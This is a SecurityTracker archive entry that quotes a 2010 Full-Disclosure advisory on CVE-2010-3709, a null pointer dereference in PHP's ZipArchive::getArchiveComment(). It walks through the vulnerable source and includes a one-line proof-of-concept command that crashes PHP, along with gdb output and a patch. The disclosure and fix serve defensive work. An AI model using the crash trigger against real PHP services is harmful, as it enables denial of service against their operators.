SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   PHP Vendors:   PHP Group
PHP Null Pointer Dereference in ZipArchive::getArchiveComment() May Let Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1024690
SecurityTracker URL:  http://securitytracker.com/id/1024690
CVE Reference:   CVE-2010-3709   (Links to External Site)
Date:  Nov 8 2010
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): 5.2.14, 5.3.3; possibly others
Description:   A vulnerability was reported in PHP. A remote user can execute arbitrary code on the target system.

A remote user can create a specially crafted zip archive that, when processed by the target application, will trigger a null pointer dereference in the ZipArchive::getArchiveComment() function and execute arbitrary code on the target system. The code will run with the privileges of the target application.

The original advisory is available at:

http://securityreason.com/achievement_securityalert/90

Maksymilian Arciemowicz of securityreason.com reported this vulnerability.

Impact:   A remote user may be able to execute arbitrary code on the target system. The specific impact depends on the application using the affected function.
Solution:   The vendor has issued a source code fix, available at:

http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/zip/php_zip.c?view=log
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/ext/zip/php_zip.c?view=log

Vendor URL:  www.php.net/ (Links to External Site)
Cause:   Access control error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Feb 3 2011 (Red Hat Issues Fix) PHP Null Pointer Dereference in ZipArchive::getArchiveComment() May Let Remote Users Execute Arbitrary Code
Red Hat has issued a fix for Red Hat Enterprise Linux 6.



 Source Message Contents

Subject:  [Full-disclosure] PHP 5.3.3/5.2.14 ZipArchive::getArchiveComment NULL Pointer Deference

This is a multi-part message in MIME format.
--------------020902000406080208060205
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[PHP 5.3.3/5.2.14 ZipArchive::getArchiveComment NULL Pointer Deference]

Author: Maksymilian Arciemowicz
http://securityreason.com/
http://cxib.net/
Date:
- - Dis.: 14.09.2010
- - Pub.: 05.11.2010

CVE: CVE-2010-3709
CWE: CWE-476
Status: Fixed in CVS

Affected Software:
- - PHP 5.3.3
- - PHP 5.2.14

Original URL:
http://securityreason.com/achievement_securityalert/90


- --- 0.Description ---
ZipArchive enables you to transparently read or write ZIP compressed
archives and the files inside them.

ZipArchive::getArchiveComment ? Returns the Zip archive comment

string ZipArchive::getArchiveComment  ( void  )


- --- 1. PHP 5.3.3/5.2.14 ZipArchive::getArchiveComment (CWE-476) ---
As we can see in

http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/zip/php_zip.c?revision=303622&view=markup

- ---
1945 	static ZIPARCHIVE_METHOD(getArchiveComment)
1946 	{
1947 	struct zip *intern;
1948 	zval *this = getThis();
1949 	long flags = 0;
1950 	const char * comment;
1951 	int comment_len = 0;
1952 	
1953 	if (!this) {
1954 	RETURN_FALSE;
1955 	}
1956 	
1957 	ZIP_FROM_OBJECT(intern, this);
1958 	
1959 	if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "|l", &flags)
== FAILURE) {
1960 	return;
1961 	}
1962 	
1963 	comment = zip_get_archive_comment(intern, &comment_len,
(int)flags); <==== RETURN NULL AND -1
1964 	RETURN_STRINGL((char *)comment, (long)comment_len, 1); <===== NULL
POINTER DEFERENCE HERE
1965 	}
- ---

this method return string from zip_get_archive_comment() function. Now
we need see this function,

http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/zip/lib/zip_get_archive_comment.c?revision=284361&view=markup

- ---
40 	ZIP_EXTERN(const char *)
41 	zip_get_archive_comment(struct zip *za, int *lenp, int flags)
42 	{
43 	if ((flags & ZIP_FL_UNCHANGED)
44 	|| (za->ch_comment_len == -1)) {
45 	if (za->cdir) {
46 	if (lenp != NULL)
47 	*lenp = za->cdir->comment_len;
48 	return za->cdir->comment;
49 	}
50 	else {
51 	if (lenp != NULL)
52 	*lenp = -1; <===================== -1
53 	return NULL; <==================== NULL
54 	}
55 	}
56 	
57 	if (lenp != NULL)
58 	*lenp = za->ch_comment_len;
59 	return za->ch_comment;
60 	}
- ---


line 52 and 53 should return NULL pointer and (int)-1. In result
RETURN_STRINGL() will be executed with:

RETURN_STRINGL(NULL, -1, 1);

and crash in memcpy(3).


- --- 2. PoC ---

cx@cx64:/www$ touch empty.zip
cx@cx64:/www$ php -r '$zip= new
ZipArchive;$zip->open("./empty.zip");$zip->getArchiveComment();'
Segmentation fault

Debug:
cx@cx64:/www$ gdb -q php
Reading symbols from /usr/bin/php...(no debugging symbols found)...done.
(gdb) r -r '$zip= new
ZipArchive;$zip->open("./empty.zip");$zip->getArchiveComment();'
Starting program: /usr/bin/php -r '$zip= new
ZipArchive;$zip->open("./empty.zip");$zip->getArchiveComment();'
[Thread debugging using libthread_db enabled]

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff530edbb in memcpy () from /lib/libc.so.6
(gdb) bt
#0  0x00007ffff530edbb in memcpy () from /lib/libc.so.6
#1  0x0000000000679fa8 in _estrndup ()
#2  0x00000000006371e5 in ?? ()
#3  0x00000000006e793a in ?? ()
#4  0x00000000006bec20 in execute ()
#5  0x000000000068b44a in zend_eval_stringl ()
#6  0x000000000068b5c9 in zend_eval_stringl_ex ()
#7  0x000000000072743e in ?? ()
#8  0x00007ffff52a6c4d in __libc_start_main () from /lib/libc.so.6
#9  0x000000000042c6a9 in _start ()
(gdb) x/i $rip
=> 0x7ffff530edbb <memcpy+347>: rep movsq %ds:(%rsi),%es:(%rdi)
(gdb) x/x $rsi
0x0:    Cannot access memory at address 0x0
(gdb) x/x $rbp
0xffffffff:     Cannot access memory at address 0xffffffff


- --- 3. Fix ---
Fix:
Replace
1963 	comment = zip_get_archive_comment(intern, &comment_len, (int)flags);
1964 	RETURN_STRINGL((char *)comment, (long)comment_len, 1);

to

1963 	comment = zip_get_archive_comment(intern, &comment_len, (int)flags);
1964	if(comment==NULL) RETURN_FALSE;
1965 	RETURN_STRINGL((char *)comment, (long)comment_len, 1);

PHP 5.3:
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/zip/php_zip.c?view=log

PHP 5.2:
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/ext/zip/php_zip.c?view=log

MDVSA-2010:218


- --- 4. Greets ---
Special thanks for Pierre Joye

sp3x, Infospec, Adam Zabrocki 'pi3'


- --- 5. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]

Email:
- - cxib {a\./t] securityreason [d=t} com

GPG:
- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

http://securityreason.com/
http://cxib.net/

- -- 
Best Regards
pub   4096R/D6E5B530 2010-09-19
uid                  Maksymilian Arciemowicz (cx) <max@cxib.net>
sub   4096R/58BA663C 2010-09-19
-----BEGIN PGP SIGNATURE-----

iQIcBAEBAgAGBQJM1GvbAAoJEIO8+dzW5bUwSNAQAK6zlkav7055LDi253vq4Urs
YIXd5u5FIrttRCMMJdANhxqFwYbMk5fUwICsw7i4qsirNg9Cdam2MI38GCi4Um2Z
so8fBo+NndTTqStM00gmJva/8HlhLw9LyXh05Ii7FcgK3DRwvAYa/1BFvAi7yBhX
EPOqRWaaeiDvehtjn/SC8enbesHE2hEUDiuNhMwZEDmdbv+EfpOMt/lBcwwdKZcE
QwXS7ElHyJ0geDB9ynnaAgmZvbnbA7aj0BpCIf+9C+Qu0kdSf4F/t0nDG2BfvvyF
wB5hT5wPYYIexsqnGPBHy48t38JTZ10mJrLVSnK5My5ODHrU1QqZau/8zMnZU7Uw
OoA5QawzW4CQX5tUfG0cD+Qd7DA2WX/ui7akw5nSHNL0AIru/IMmdZwXHuqJke6R
AfQlY3VznE0V7/O9F+y2gkbkAMTdVjddU6N6Z72hJSrzRCxIgqcSFIXOtQIXz6fl
H4ymSLL0VydYrG6kiw4b6UgAXRhWFEsjrSmpYS61MnWTsx+B55ERjIXoQpiBYTbl
RRrDvXDCa9r/xpAX/yC2FVz7ECfOePI+gx/FW2dSBBEKe340xsmE/H90iLUWhDhX
csCYgZWvIe8mAZ3zT3c0ONAoRPWjnLo+QhMZtyZk4vc294C9spdR8uAlGxIVfQf5
+RibkqlDnn1yRveXjRpO
=REiM
-----END PGP SIGNATURE-----

--------------020902000406080208060205
Content-Type: application/pgp-keys;
 name="0xD6E5B530.asc"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
 filename="0xD6E5B530.asc"

-----BEGIN PGP PUBLIC KEY BLOCK-----

mQINBEyV/94BEAC40SpLGJC5QZyQcACeCWrVn7OHq+paHvO6j4SMLXzFqG/AmGpg
s76yvKJWUpaGetImw8VXYk06Gd5SlmMeZDi9zfzdEw4UXp81qkyWYOa6OEKlg1UJ
AHXdOTctF5x2yfZGtwU+BhtN6xmaJXQl7ZeQrH95RNPU+fDO+k7p0N9qztPzXCVZ
SREHcodD51CwbyLo1PM25XcC3vlvhVQFY36KCxoO5/BkUUIDoqAv9MaiPNBPM1Wm
4rv//Wz8un45geR+7cqEI5R7YxlqslV/RdhCsgeVF+s1eP+DB/pv2f/HWm7UuiQg
p6tU3X3dlbFzpeApm6TcTXrtttMPE8/w8sStSDNEsrI4uKG5v++vpOAu6mQj1u6i
5QPpgOECy0QdhXPSHlwOG6p1Yh5Tt+JcgqfDZ7LY4BGd2hkzKG6+kfi1328ndF3Q
vlWN1VK6uaRfC11obRHSba2xyLWnAroJjoLY9GEOt1rWeg+r7N8sQGCjQ/HObllx
FJ8W9OTL9Pr/khOdkQR57pRqUfILYeSbAs7ycYwxZe0aYtZgZYuKyZNmy9AsBKiD
6aYXMNITM/ioTt0FKvsshe7tyQq6m4leSo99sKajWnN0viO3r8UXlC6ZL+K2uuT4
pbAmYizfA7OGk5IiPduwgtiNCMegc3CED5xRayb5QXoxXmltUctmjb6zhQARAQAB
tCtNYWtzeW1pbGlhbiBBcmNpZW1vd2ljeiAoY3gpIDxtYXhAY3hpYi5uZXQ+iQI4
BBMBAgAiBQJMlf/eAhsDBgsJCAcDAgYVCAIJCgsEFgIDAQIeAQIXgAAKCRCDvPnc
1uW1MKq4D/99Rl6589i6dJnKyRWUxUVhEIIh3/Yl20oGCO40WHNRKtxhs+E07Ksc
3kEfoFHxaHxdb6AJPq5Y1b4xshvT9UnL4JHXEdl6uH56lgVOthgYgSZ5GmncweLW
HeXon5p2TbihL7NI8Qpotj5jC1v+toEzaDEpqHNVN1K26KVan2li9kDDbd6N9/5B
FEr4gAVwfmrHooh34NBqZZWL+ZXVeqLbUZ0+R8kOIgFOm1Za6MA2lGryAwpPk6qm
hURZ8ATkXM9Dwz02Y9h2mX//cb8VTRfFuuDgP7A5Xg1jJTCa41Z5uZTCzAOigCL1
XxG/YNX62fj5ZaIgXyrZ45OWVOTwdFFt//KQ4bixdv1JfwQGaID73ND77Q2GkpVQ
tuQAMNzi7sVpw4KO0NbuwptvxbMtJbJbMRLV7AMJIUcZ1syoEz3IGPc7DWe/4SIA
jHmXaHU7qw0jC5YqnuwdZwLmBzOp53+NoOYW2uRc38r4y6NZOaWjDzLlcr/vgNzJ
DTW52aXopAcw7cjUKLKfvBEO9nDSxN8aQPSpyigrTRzZ+wZZwhqycLfqEfLt0V9u
LFj+SWAkWRARkQPd/3+uLHIZmiQ5nEoTfxhhjLZiaWGXLndXEbcmQxnaaAgxvO0f
XEK48Eesh+AEKAzwKlC2L2zkvvWwVwoSBpOFnCWPgOP5X9sJSZHsGLkCDQRMlf/e
ARAAwL2uc54tTvkqDGt4yePJzwrev9aI+SsNEkD2niDE+IanQ8tJvcxa2MqgRU3j
qcgYbFHr5YLzQG+fW4hkCSkKyPhew+63TjfPJjhLjo7dqebW+zcXFgmcCvbv0+An
yxQacfsF+3Lbv+NBEYtSh3TiP/DKdcw/kfaOyQepbvfV162tTGwkTdcoVDkF69uX
Glmc4n3XhWd6cVy0XpzZARDfqKw/MQVvTvD3Lpr+NbjxksMGe8pcpWGBA1+J4rOE
zbCL4AQ841qblFliouBnJkaczdTEJVaXtG2iBTiBSdl6WrMKbR0lQAlKQTXe+kGb
ZCnXiV4LBfPVt9UKXQHN2+kgKhM3+b6steM8TsmMF5OUshsqY0q0aqfgW8goqZ+N
auQb2yYTTWYrvFB2zcmXXmtK2S7rMyQiGcLxUwTI97zUzM0HlCpx0i9IxZladCrp
t4X4jGTHAnxkTU0qmvCapXZmFRYSVH73rsq1PiV8IlTLOzpdju962Hg7Vx9fj0Nx
DPwdnkZi/y020ZTkkFDQknyNxMKIpjKiNJ72whcuve1TnpQt1bIxVkvWjKHRAdNy
A3hGn6TLRjYXnrtQCcD0HtBI3d7uuMpBAc50yaZsXks/wLL8vIjE/OnLvFqZJ/oL
dBpX6TDjmE+lfpgWExKQRSvM3z6QVXGj0OqRd3iwut34TvUAEQEAAYkCHwQYAQIA
CQUCTJX/3gIbDAAKCRCDvPnc1uW1ML2HD/9RHsfVMEYFPUYkUP/FoOVlzth6ijcz
AqFPVDdAd3J2UFfCYKkqMXq+LenNU9KREI6xJrktDVfL+R1sWHNwhx8vYDAQWZ62
VvKG36ZqgbSzYAxaBZA5HWNK3F4KzsTT7pzRNBU52ZsVMsHWA42nmxNlasHMRDZA
hSrkLPyIMtoL5lzZ2ELSQEezcpIqH1vGAicT2+tZeCLAHZTMpeKAZIuWjMEoQtXH
hE2syCv/K5lTDvjSGAPCi4By97WgecA/SWqdO6FH5vleLwj3PJBjF2iyPBgFDBD4
pLpp1P/xFDU/M7Rl0mcJH1nM82i1JKmohqTYJHeu7Kb3vY4C3NEwghVzsWhCLe1a
nIhh/qkPOGBghygI1cUVP8fo4nspqApvXtN2qdT6jy/PKMkqob66vusNY759kRVs
hpA0P8gTZ2jFm4VCrccBvR+yRrSZtFR0fphrwGoFwhHd2fTXtJo6JYhQOFUMg7m4
kBOeEUjmDoJFrxZycWowLLU9ao7jB+1qUCt9EsT6oA442CJcAP5kohHN+xzSiXhV
6uRII8B4I+c0Oyw4ld5VKVlk1nueVifZYFPKDJ07t48d8dGtUbGqNO93Mxy3YHfl
QvjN8M7Oov7LZ5kue6aL1IeWJxEfko/nZFaCfXqqIGwxspDWRwGuGDnKkqPGJR0t
fjZe+G0TJgIG+Q==
=9W/9
-----END PGP PUBLIC KEY BLOCK-----

--------------020902000406080208060205
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--------------020902000406080208060205--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC